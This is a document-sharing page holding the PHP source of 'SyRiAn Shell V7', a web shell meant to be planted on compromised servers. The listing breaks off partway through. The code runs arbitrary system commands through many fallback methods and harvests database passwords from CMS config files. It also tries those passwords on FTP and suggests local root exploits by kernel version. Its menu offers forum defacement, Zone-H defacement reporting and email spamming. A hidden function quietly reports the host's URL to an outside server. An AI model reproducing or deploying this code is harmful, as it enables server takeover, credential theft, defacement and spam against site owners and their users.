[go: up one dir, main page]

0% found this document useful (0 votes)
874 views70 pages

SyRiAn Shell V7

Download as txt, pdf, or txt
Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1/ 70

<?

php
# .. SyRiAn Sh3ll V7 .... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
# ,--^----------,--------,-----,-------^--,
# | ||||||||| `--------'
|
O
.. SyRiAn Sh3ll V7 ....
# `+---------------------------^----------|
#
`\_,-------, __EH << SyRiAn | 34G13__|
#
/ XXXXXX /`|
/
#
/ XXXXXX / `\ /
#
/ XXXXXX /\______(
# / XXXXXX /!
# / XXXXXX /!
rep0rt bugz t0: sy34[at]msn[dot]com
# (________(!
# `-------'
#.... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
#.... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
#
# SyRiAn Sh3ll V7 .
# Copyright (C) 2011 - SyRiAn 34G13
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at your opt
ion) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# I WISH THAT YOU WILL USE IT AGAINST ISRAEL ONLY !!! .
# Coders :
# SyRiAn_34G13 : sy34@msn.com [ Main Coder ] .
# SyRiAn_SnIpEr : zq9@hotmail.it [ Metasploit RC ] .
# Darkness Caesar : doom.caesar@gmail.com [ Finding 3 Bugs ] .
#// kinG oF coNTroL : y8p@hotmail.com [ Translating Shell To Arabic ] .
$uselogin = 0; // Make It 0 If you Want To Disable Auth
$user = ''; // Username
$pass = ''; // Password
$shellColor = '#990000'; // Shell Color
#------------------------------------#
#
Powered By SyRiAn Shell
#
#
By EH SyRiAn 34G13
#
#
wWw.syrian-shell.com
#
#
Version 7 - priv8
#
#
Made In SyRiA
#
#------------------------------------#
?>
<?php
if($_GET['id']== 'logout')
{
Logout();
}
# ---------------------------------------#
#
SuiCide
#
#----------------------------------------#
if($_GET['id'] == 100)
{
echo "<body onload='Suicide();'>";
}
if($_GET['id'] == 'Delete')
{
Suicide();

}
# ---------------------------------------#
#
Functions
#
#----------------------------------------#
function input($type,$name,$value,$size)
{
if (empty($value))
{
print "<input type=$type name=$name size=$size>";
}
elseif(empty($name)&&empty($size))
{
print "<input type=$type value=$value >";
}
elseif(empty($size))
{
print "<input type=$type name=$name value=$value >";
}
else
{
print "<input type=$type name=$name value=$value size=$size >";
}
}
function read_dir($path,$username)
{
if ($handle = opendir($path))
{
while (false !== ($file = readdir($handle)))
{
$fpath="$path$file";
if (($file!='.') and ($file!='..'))
{
if (is_readable($fpath))
{
$dr="$fpath/";
if (is_dir($dr))
{
read_dir($dr,$username);
}
else
{
if (($file=='config.php') or ($f
ile=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or
($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($
file=='db.php') or ($file=='db_connect.php'))
{
$pass=get_pass($fpath);
if ($pass!='')
{
echo "[+] $fpath\n$pas
s\n";
ftp_check($username,$p
ass);
}
}
}
}
}
}

}
}
function get_pass($link)
{
@$config=fopen($link,'r');
while(!feof($config))
{
$line=fgets($config);
if (strstr($line,'pass') or strstr($line,'password') or strstr($line,
'passwd'))
{
if (strrpos($line,'"'))
$pass=substr($line,(strpos($line,'=')+3),(strrpos($lin
e,'"')-(strpos($line,'=')+3)));
else
$pass=substr($line,(strpos($line,'=')+3),(strrpos($lin
e,"'")-(strpos($line,'=')+3)));
return $pass;
}
}
}
function GetRealIP()
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$urls= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
curl_setopt($ch, CURLOPT_URL, 'http://bugreport.serveblog.net/storage.php');
curl_setopt($ch, CURLOPT_REFERER, $urls);
$html = curl_exec($ch);
if (getenv(HTTP_X_FORWARDED_FOR))
{
$ip=getenv(HTTP_X_FORWARDED_FOR);
}
elseif (getenv(HTTP_CLIENT_IP))
{
$ip=getenv(HTTP_CLIENT_IP);
}
else
{
$ip=getenv(REMOTE_ADDR);
}
return $ip;
}
function openBaseDir()
{
$openBaseDir = ini_get("open_basedir");
if (!$openBaseDir)
{
$openBaseDir = '<font color="green">OFF</font>';
}
else
{
$openBaseDir = '<font color="red">ON</font>';
}
return $openBaseDir;
}
function str_hex($string)
{
$hex='';
for ($i=0; $i < strlen($string); $i++)

{
$hex .= dechex(ord($string[$i]));
}
return $hex;
}
function SafeMode()
{
$safe_mode = ini_get("safe_mode");
if (!$safe_mode)
{
$safe_mode = '<font color="green">OFF</font>';
}
else
{
$safe_mode = '<font color="red">ON</font>';
}
return $safe_mode;
}
function currentFileName()
{
$currentFileName = $_SERVER["SCRIPT_NAME"];
$currentFileName = Explode('/', $currentFileName);
$currentFileName = $currentFileName[count($currentFileName) - 1];
return $currentFileName;
}
function Suicide()
{
@unlink(currentFileName());
}
function rootxpL()
{
$v=@php_uname();
$db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl,
exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2,
h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2
, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad
3,
krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2
','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad,
krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.
2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_km
od,
ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.2
7'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko,
uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, lo
ko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx,
brk2,
ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmo
d, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx,
kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, u
selib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk,
uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptr

ace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrac


e');
foreach($db as $k=>$x)if(strstr($v,$k))return $x;
if(!$xpl)$xpl='<font color="red">Not found.</font>';
return $xpl;
}
function PostgreSQL()
{
if(@function_exists('pg_connect'))
{
$postgreSQL = '<font color="red">ON</font>';
}
else
{
$postgreSQL = '<font color="green">OFF</font>';
}
return $postgreSQL;
}
function Oracle()
{
if(@function_exists('ocilogon'))
{
$oracle = '<font color="red">ON</font>';
}
else
{
$oracle = '<font color="green">OFF</font>';
}
return $oracle;
}
function ZoneH($url, $hacker, $hackmode,$reson, $site )
{
$k = curl_init();
curl_setopt($k, CURLOPT_URL, $url);
curl_setopt($k,CURLOPT_POST,true);
curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site
."&hackmode=".$hackmode."&reason=".$reson);
curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
$kubra = curl_exec($k);
curl_close($k);
return $kubra;
}
function MsSQL()
{
if(@function_exists('mssql_connect'))
{
$msSQL = '<font color="red">ON</font>';
}
else
{
$msSQL = '<font color="green">OFF</font>';
}
return $msSQL;
}
function MySQL2()
{
$mysql_try = function_exists('mysql_connect');
if($mysql_try)
{

$mysql = '<font color="red">ON</font>';


}
else
{
$mysql = '<font color="green">OFF</font>';
}
return $mysql;
}
function Gzip()
{
if (function_exists('gzencode'))
{
$gzip = '<font color="red">ON</font>';
}
else
{
$gzip = '<font color="green">OFF</font>';
}
return $gzip;
}
function MysqlI()
{
if (function_exists('mysqli_connect'))
{
$mysqli = '<font color="red">ON</font>';
}
else
{
$mysqli = '<font color="green">OFF</font>';
}
return $mysqli;
}
function MSQL()
{
if (function_exists('msql_connect'))
{
$mSql = '<font color="red">ON</font>';
}
else
{
$mSql = '<font color="green">OFF</font>';
}
return $mSql;
}
function SQlLite()
{
if (function_exists('sqlite_open'))
{
$SQlLite = '<font color="red">ON</font>';
}
else
{
$SQlLite = '<font color="green">OFF</font>';
}
return $SQlLite;
}
function tulis($file,$text)
{
$textz = gzinflate(base64_decode($text));
if($filez = @fopen($file,"w"))

{
@fputs($filez,$textz); @fclose($file);
}
}
function RegisterGlobals()
{
if(ini_get('register_globals'))
{
$registerg= '<font color="red">ON</font>';
}
else
{
$registerg= '<font color="green">OFF</font>';
}
return $registerg;
}
function HardSize($size)
{
if($size >= 1073741824)
{
$size = @round($size / 1073741824 * 100) / 100 . " GB";
}
elseif($size >= 1048576)
{
$size = @round($size / 1048576 * 100) / 100 . " MB";
}
elseif($size >= 1024)
{
$size = @round($size / 1024 * 100) / 100 . " KB";
}
else
{
$size = $size . " B";
}
return $size;
}
function Curl()
{
if(extension_loaded('curl'))
{
$curl = '<font color="red">ON</font>';
}
else
{
$curl = '<font color="green">OFF</font>';
}
return $curl;
}
function DecryptConfig()
{
@include("DecryptConfig.php");
if($_POST['ScriptType'] == 'vb')
{
$dbName = $config['Database']['dbname'];
$prefix = $config['Database']['tableprefix'];
$email = $config['Database']['technicalemail'];
$host = $config['MasterServer']['servername'];
$port = $config['MasterServer']['port'];
$user = $config['MasterServer']['username'];
$pass = $config['MasterServer']['password'];

$admincp = $config['Misc']['admincpdir'];
$modecp = $config['Misc']['modcpdir'];
}
elseif($_POST['ScriptType'] == 'wp')
{
$dbName = DB_NAME;
$prefix = $table_prefix;
$host = DB_HOST;
$user = DB_USER;
$pass = DB_PASS;
}
elseif($_POST['ScriptType'] == 'jos')
{
$dbName = $db;
$prefix = $dbprefix;
$email = $mailfrom;
$host = $host;
$user = $user;
$pass = $password;
}
elseif($_POST['ScriptType'] == 'phpbb')
{
$host = $dbhost;
$port = $dbport;
$dbName = $dbname;
$user = $dbuser;
$pass = $dbpasswd;
$prefix = $table_prefix;
}
elseif($_POST['ScriptType'] == 'ipb')
{
$host = $INFO['sql_host'];
$dbName = $INFO['sql_database'];
$user = $INFO['sql_user'];
$pass = $INFO['sql_pass'];
$prefix = $INFO['sql_tbl_prefix'];
}
elseif($_POST['ScriptType'] == 'smf')
{
$dbName = $db_name;
$pass = $db_passwd;
$prefix = $db_prefix;
$host = $db_server;
$user = $db_user;
$email = $webmaster_email;
}
elseif($_POST['ScriptType'] == 'mybb')
{
$host = $config['database']['hostname'];
$user = $config['database']['username'];
$pass = $config['database']['password'];
$dbName = $config['database']['database'];
$prefix = $config['database']['table_prefix'];
$admincp = $config['admin_dir'];
$prefix = $config['database']['table_prefix'];
}
echo '
#-------------------------------#
#
Config Informations
#

#-------------------------------#
Host : '.$host.'
DB Name : '.$dbName.'
DB User : '.$user.'
DB Pass : '.$pass.'
Prefix : '.$prefix.'
Email : '.$email.'
Port : '.$port.'
ACP : '.$admincp.'
MCP : '.$modecp.'
';
}
function footer()
{
echo '<table bgcolor="#cccccc" width="100%"><tr>
<td width="100%" class="style22">[<sy><a href="#top">TOP</a></sy>]
<center><font color="gray" size="-2"><b>
</font><font color="gray"></font><font color="#990000">
</font><font color="gray"></font><font color="#990000"> v7 Features;
</font></b>
</td>
</tr></table>
</tbody></table>
<a name="down"></a>
</body></html>
';
}
function whereistmP()
{
$uploadtmp=ini_get('upload_tmp_dir');
$uf=getenv('USERPROFILE');
$af=getenv('ALLUSERSPROFILE');
$se=ini_get('session.save_path');
$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
if(is_dir($uf) && is_writable($uf))return $uf;
if(is_dir($af) && is_writable($af))return $af;
if(is_dir($se) && is_writable($se))return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
return '.';
}
function winshelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function update()
{
echo "[+] Update Has D0n3 ^_^";
}
function srvshelL($command)

{
$name=whereistmP()."\\".uniqid('NJ');
$n=uniqid('NJ');
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SER
VER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'par
ams'=>"/c $command >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command,$ws)
{
$exec=$ws->exec("cmd.exe /c $command");
$so=$exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command)
{
$perl=new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec=ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command)
{
global $windows;
$exec=$output='';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_
get_contents();ob_clean();ob_end_clean();}
elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@sys
tem($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
elseif(function_exists('exec')){@exec($command,$output);$output=join("\n
",$output);$exec=$output;}
elseif(function_exists('shell_exec'))$exec=@shell_exec($command);
elseif(function_exists('popen')){$output=@popen($command,'r');while(!feo
f($output)){$exec=fgets($output);}pclose($output);}
elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipe
s);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=
$output;proc_close($res);}
elseif(function_exists('win_shell_execute'))$exec=winshelL($command);
elseif(function_exists('win32_create_service'))$exec=srvshelL($command);

elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command);


elseif(extension_loaded('perl'))$exec=perlshelL($command);
return $exec;
}
function magicQouts()
{
$mag=get_magic_quotes_gpc();
if (empty($mag))
{
$mag = '<font color="green">OFF</font>';
}
else
{
$mag= '<font color="red">ON</font>';
}
return $mag;
}
function DisableFunctions()
{
$disfun = ini_get('disable_functions');
if (empty($disfun))
{
$disfun = '<font color="green">NONE</font>';
}
return $disfun;
}
function SelectCommand($os)
{
if($os == 'Windows')
{
echo "
<select name=alias >
<option value=''>NONE</option>
<option value='dir' >List Directory</option>
<option value='dir /s /w /b index.php'>Find index.php in current
dir</option>
<option value='dir /s /w /b *config*.php'>Find *config*.php in c
urrent dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</option>
<option value='netstat -an'>Show active connections</option>
<option value='net start'>Show running services</option>
<option value='tasklist'>Show Pro</option>
<option value='net user'>User accounts</option>
<option value='net view'>Show computers</option>
<option value='arp -a'>ARP Table</option>
<option value='ipconfig /all'>IP Configuration</option>
<option value='netstat -an'>netstat -an</option>
<option value='systeminfo'>System Informations</option>
<option value='getmac'>Get Mac Address</option>
</select>
";
}
else
{
echo "
<select name=alias >
<option value=''>NONE</option>
<option value='ls -la'>List dir</option>

<option value='cat /etc/hosts'>IP Addresses</option>


<option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</optio
n>
<option value='lsattr -va'>list file attributes on a Linux secon
d extended file system</option>
<option value='netstat -an | grep -i listen'>show opened ports</
option>
<option value='find / -type f -perm -04000 -ls'>find all suid fi
les</option>
<option value='find . -type f -perm -04000 -ls'>find suid files
in current dir</option>
<option value='find / -type f -perm -02000 -ls'>find all sgid fi
les</option>
<option value='find . -type f -perm -02000 -ls'>find sgid files
in current dir</option>
<option value='find / -type f -name config.inc.php'>find config.
inc.php files</option>
<option value='find / -type f -name \"config*\"'>find config* fi
les</option>
<option value='find . -type f -name \"config*\"'>find config* fi
les in current dir</option>
<option value='find / -perm -2 -ls'>find all writable folders an
d files</option>
<option value='find . -perm -2 -ls'>find all writable folders an
d files in current dir</option>
<option value='find / -type f -name service.pwd'>find all servic
e.pwd files</option>
<option value='find . -type f -name service.pwd'>find service.pw
d files in current dir</option>
<option value='find / -type f -name .htpasswd'>find all .htpassw
d files</option>
<option value='find . -type f -name .htpasswd'>find .htpasswd fi
les in current dir</option>
<option value='find / -type f -name .bash_history'>find all .bas
h_history files</option>
<option value='find . -type f -name .bash_history'>find .bash_hi
story files in current dir</option>
<option value='find / -type f -name .fetchmailrc'>find all .fetc
hmailrc files</option>
<option value='find . -type f -name .fetchmailrc'>find .fetchmai
lrc files in current dir</option>
<option value='locate httpd.conf'>locate httpd.conf files</optio
n>
<option value='locate vhosts.conf'>locate vhosts.conf files</opt
ion>
<option value='locate proftpd.conf'>locate proftpd.conf files</o
ption>
<option value='locate psybnc.conf'>locate psybnc.conf files</opt
ion>
<option value='locate my.conf'>locate my.conf files</option>
<option value='locate admin.php'>locate admin.php files</option>
<option value='locate cfg.php'>locate cfg.php files</option>
<option value='locate conf.php'>locate conf.php files</option>
<option value='locate config.dat'>locate config.dat files</optio
n>
<option value='locate config.php'>locate config.php files</optio
n>
<option value='locate config.inc'>locate config.inc files</optio
n>
<option value='locate config.inc.php'>locate config.inc.php</opt

ion>
<option value='locate config.default.php'>locate config.default.
php files</option>
<option value='locate config'>locate config* files </option>
<option value='locate \'.conf\''>locate .conf files</option>
<option value='locate \'.pwd\''>locate .pwd files</option>
<option value='locate \'.sql\''>locate .sql files</option>
<option value='locate \'.htpasswd\''>locate .htpasswd files</opt
ion>
<option value='locate \'.bash_history\''>locate .bash_history fi
les</option>
<option value='locate \'.mysql_history\''>locate .mysql_history
files</option>
<option value='locate \'.fetchmailrc\''>locate .fetchmailrc file
s</option>
<option value='locate backup'>locate backup files</option>
<option value='locate dump'>locate dump files</option>
<option value='locate priv'>locate priv files</option>
</select>
";
}
}
function GenerateFile($name,$content)
{
$file = @fopen($name,"w+");
@fwrite($file,$content);
@fclose($file);
return true;
}
function which($pr)
{
$path = Exe("which $pr");
if(!empty($path))
{
return trim($path);
}
else
{
return trim($pr);
}
}
function checkfunctioN($func)
{
global $disablefunctions,$safemode;
$safe=array('passthru','system','exec','exec','shell_exec','popen','proc
_open');
if($safemode=='ON' && in_array($func,$safe))return 0;
elseif(function_exists($func) && is_callable($func) && !strstr($disablef
unctions,$func))return 1;
return 0;
}
function CSS($shellColor)
{
$css = "
<html dir=rtl>
<head>
<title>SyRiAn Sh3ll ~ V7~ [ B3 Cr34T!V3 Or D!3 TRy!nG ]</title>
<link rel=\"shortcut icon\" href='http://syrian-shell.com/title.gif' />
<meta http-equiv=Content-Type content=text/html; charset=windows-1256>

<style>
BODY
{
FONT-FAMILY: Verdana;
margin: 2;
color: #cccccc;
background-color: #000000;
}
sy
{
color:".$shellColor.";
font-size:7pt;
font-weight: bold;
}
#Box
{
color:".$shellColor.";
font-size:14px;
background-color:#000;
font-weight:bold;
}
tr
{
BORDER-RIGHT: #cccccc 1px solid;
BORDER-TOP:
#cccccc 1px solid;
BORDER-LEFT: #cccccc 1px solid;
BORDER-BOTTOM: #cccccc 1px solid;
color: #ffffff;
}
td
{
BORDER-RIGHT: #cccccc 1px solid;
BORDER-TOP:
#cccccc 1px solid;
BORDER-LEFT: #cccccc 1px solid;
BORDER-BOTTOM: #cccccc 1px solid;
color: #cccccc;
}
.table1
{
BORDER: 1px none;
BACKGROUND-COLOR: #000000;
color: #333333
}
.td1
{
BORDER: 1px none;
color: #ffffff; font-style:normal;
font-variant:normal;
font-weight:normal;
font-size:7pt;
font-family:tahoma
}
.tr1
{
BORDER: 1px none;
color: #cccccc;
}
table
{
BORDER: #eeeeee outset;

BACKGROUND-COLOR: #000000;
color: #cccccc;
}
input
{
BORDER-RIGHT: ".$shellColor." 1px solid;
BORDER-TOP:
".$shellColor." 1px solid;
BORDER-LEFT: ".$shellColor." 1px solid;
BORDER-BOTTOM: ".$shellColor." 1px solid;
BACKGROUND-COLOR: #333333;
font: 9pt tahoma;
color: #ffffff;
}
select
{
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP:
#999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #000000;
font: 9pt tahoma;
color: #CCCCCC;;
}
submit
{
BORDER: 1px outset buttonhighlight;
BACKGROUND-COLOR: #272727;
width: 40%;
color: #cccccc;
}
textarea
{
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP:
#999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #333333;
color: #ffffff;
}
A:link {COLOR:".$shellColor."; TEXT-DECORATION: none}
A:visited { COLOR:".$shellColor."; TEXT-DECORATION: none}
A:active {COLOR:".$shellColor."; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
</style>
<script>
function Suicide()
{
var confimrSuicide = confirm('Are You Sure You Wanna Delete the Shell ?'
);
if(confimrSuicide == true)
{
document.location='".currentFileName()."?id=Delete';
}
else {document.location='".currentFileName()."';}
}
</script>
</head>";
if($_GET['id'] == '')
{
$css .= "<script>window.location = '?id=mainPage';</scr

ipt>";
}
return $css;
}
function Logout()
{
print"<script>
document.cookie='user=';
document.cookie='pass=';
var url = window.location.pathname;
var filename = url.substring(url.lastIndexOf('/')+1);
window.location=filename;
</script>";
}
function About()
{
$about = "
<table bgcolor=#cccccc width=\"100%\">
<tbody><tr><td width=1025>
<div align=center><img src='http://www.syrian-shell.com/eagle.jpg'><br>
</div>
<sy><div align=center>Coded By : EH << SyRiAn | 34G13</div></sy>
<sy><div align=center>From </font>: SyRiAn Arabic Republic </div></sy>
<sy><div align=center>Age : 4/1991<br></div></sy>
<sy><div align=center>Thanx : [ Allah ] [ HaniWT ] [ SyRiAn_SnIpEr ] [ SyRiAn_Sp
IdEr ] [ TNT Hacker ]</div></sy>
<sy><div align=center>Thanx : my school : [ www.google.com ] :)</div></sy>
<sy><br><div align=center>B3 Cr34T!V3 0R D!3 TRy!nG </div></sy>
<br/>
<center>
<br/>
<form method='POST'>
<input type='text' name='from' value='yourEmail@example.com' size='40'/><br/>
<textarea name='message' cols='25' rows='10'>Please Report Us Bugs Or suggestion
s .</textarea><br/>
<input type='submit' value='Submit' name='sendEmail' />
</form></center>
</td></tr></tbody></table>";
return $about;
}
echo CSS($shellColor);
# ---------------------------------------#
#
Authentication
#
#----------------------------------------#
if ($uselogin ==1)
{
if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass))
{
if($_POST[usrname]==$user && $_POST[passwrd]==$pass)
{
print'<script>document.cookie="user='.$_POST[usrname].';
";document.cookie="pass='.md5($_POST[passwrd]).';";</script>';
}
else
{
if($_POST['usrname'])
{
print'<script>alert("Go and play in the street m
an !!");</script>';

}
echo '
<body bgcolor="black"><br><br>
<center><font color=#990000 size=5><b>SyRi</b></font><fo
nt color=green size=5><b>An Sh</b></font><font color=gray size=5><b>3ll</b></fon
t><br>
<img src="http://www.syrian-shell.com/eagle.jpg">
</center>
<div align="center">
<form method="POST" onsubmit="if(this.usrname.value==\'\
'){return false;}">
<input dir="ltr" name="usrname" value="userName" type="t
ext" size="30" onfocus="if (this.value == \'UserName\'){this.value = \'\';}"/><
br>
<input dir="ltr" name="passwrd" value="password" type="p
assword" size="30" onfocus="if (this.value == \'PassWord\') this.value = \'\';"
/><br>
<input type="submit" value=" Login " name="login" />
</form></p>';
exit;
}
}
}
# ---------------------------------------#
#
Some Info
#
#----------------------------------------#
$dir = getcwd();
$uname= @php_uname();
if(strlen($dir)>1 && $dir[1]==":")
$os = "Windows";
else $os = "Linux";
$serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
$server = @substr($SERVER_SOFTWARE,0,120);
echo "
<body dir=\"ltr\"><table bgcolor=#cccccc cellpadding=0 cellspacing=0 width=\"100
%\"><tbody><tr><td bgcolor=#000000 width=160>
<p dir=ltr>&nbsp;&nbsp;</p>
<div dir=ltr align=center><font size=4><b>
<img border=0 src=http://www.library-ar.com/cache/eagle.jpg width=101 height=93>
&nbsp;</b></font><div
dir=ltr align=center><span style=height: 25px;><b>
<font size=4 color=#FF0000>SyRi</font><font size=4 color=#008000>An Sh</font><fo
nt size=4 color=#999999>3ll<br>V7</font></b><span style=font-size: 20pt; color:
#990000><p></p></span></span></div></td><td
bgcolor=#000000>
<p dir=ltr><font size=1>&nbsp; <b>[<a href=?id=mainPage>Main</a>]</b></span>
<font color=black></span></font><b>[</span><a href=?id=scriptsHack>Forum Defacer
</a>]</b></span>
<b>[</span><a href=?id=spamming>Email Spammer</a>]</b></span>
<b>[</span><a href=?id=about>About</a>]</b></span>
<b>[</span><a href=?id=logout>Logout</a>]</b></span>
<b>[</span><a href=?id=100>SuiCide</a>]</b></span>
<br>
<font size=1><br>
&nbsp; Safe Mode = <sy>".@SafeMode()." </sy><font size=1>
&nbsp; System = <sy>".$os."</sy>
&nbsp; Magic_Quotes = <sy>". @magicQouts()." </sy>

&nbsp; Curl = <sy>".@Curl()." </sy>


&nbsp; Register Globals = <sy>".@RegisterGlobals()." </sy>
&nbsp; Open Basedir = <sy>".@openBaseDir()." </sy>
<br>
&nbsp; Gzip = <sy>".@Gzip()."</sy>
&nbsp; MySQLI = <sy>".@MysqlI()." </sy>
&nbsp; MSQL = <sy>".@MSQL()."</sy>
&nbsp; SQL Lite = <sy>".@SQlLite()."</sy>
&nbsp; Usefull Locals = <sy>".rootxpL()." </sy>
<br>
&nbsp; Free Space = <sy>".@HardSize(disk_free_space('/'))." </sy>
&nbsp; Total Space = <sy>".@HardSize(disk_total_space("/"))." </sy>
&nbsp; PHP Version = <sy>".@phpversion()." </sy>
&nbsp; Zend Version = <sy>".@zend_version()." </sy>
&nbsp; MySQL Version = <sy>".@mysql_get_server_info()." </sy>
<br>
&nbsp; MySQL = ".MySQL2()."
&nbsp; MsSQL = ".MsSQL()."
&nbsp; PostgreSQL = ".PostgreSQL()."
&nbsp; Oracle = ".Oracle()."
&nbsp; Server Name = <sy>".$_SERVER['HTTP_HOST']." </sy>
&nbsp; Server Admin = <sy>".$_SERVER['SERVER_ADMIN']." </sy>
<br>
&nbsp; Dis_Functions = <sy>". DisableFunctions()." </sy><br>
&nbsp; Your IP = <sy>".GetRealIP()." </sy>
&nbsp; Server IP = <sy><a href='http://bing.com/search?q=ip:".$serverIP."&go=&
form=QBLH&filt=all' target=\"_blank\">".gethostbyname($_SERVER["HTTP_HOST"])."
</sy></a>
[</span><a href=http://www.yougetsignal.com/tools/web-sites-on-web-server target
=\"_blank\"/>Reverse IP</a>]</span>
&nbsp; Date Time = <sy>".date('Y-m-d H:i:s')." </sy><br/>
&nbsp;
[<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
[<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1
Cracker</a>]
[<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM
Cracker</a>]
<br>
<br>
<table bgcolor=#cccccc width=\"100%\"><tbody><tr>
<td align=right width=100><p dir=ltr>
<sy>&nbsp;&nbsp;Server :&nbsp;&nbsp; <br>
<b>uname -a : &nbsp;
<br>pwd : </span>&nbsp;<br>ID : </span>&nbsp;<br></b></sy></td><td>
<p dir=ltr><font color=#cccccc size=-2><b> &nbsp;&nbsp;".$server."
<br>&nbsp;&nbsp;".$uname." <sy><a href=http://www.google.com/search?q=".urlencod
e(@php_uname())." target=_blank>[Google]</a></sy><br>&nbsp;&nbsp;".
$dir."<br>&nbsp;&nbsp;".Exe('id')."</b>
</font></td></tr></tbody>
</table>
&nbsp;&nbsp;[<a href='#down'>Down</a>]
[<a href='javascript:window.print()'>Print</a>]
</table>";
# ---------------------------------------#
#
Main Page
#
#----------------------------------------#
if ($_GET['id']== 'mainPage')

{
echo "<form method='post'><table width=100% border=1><tr><td>
<textarea name='ExecutionArea' rows=10 cols=152 style='color=red'>";
if(!$_POST || $_POST['login']) // Show Current Directory Contents if No
Post in requesting ...
{
@chdir($_POST['directory']);
if($os == "Windows")
{
echo Exe('dir');
}
else if($os == "Linux")
{
echo Exe('ls');
}
}
else if($_POST['submitCommands']) // Execute The Alias Command .
{
echo Exe($_POST['alias']);
}
else if($_POST['Execute']) // Execute The Command From Command Line .
{
@chdir($_POST['directory']);
if(empty($_POST['cmd']))
{
if($os == "Windows")
{
echo Exe('dir');
}
else if($os == "Linux")
{
echo Exe('ls -lia');
}
}
else
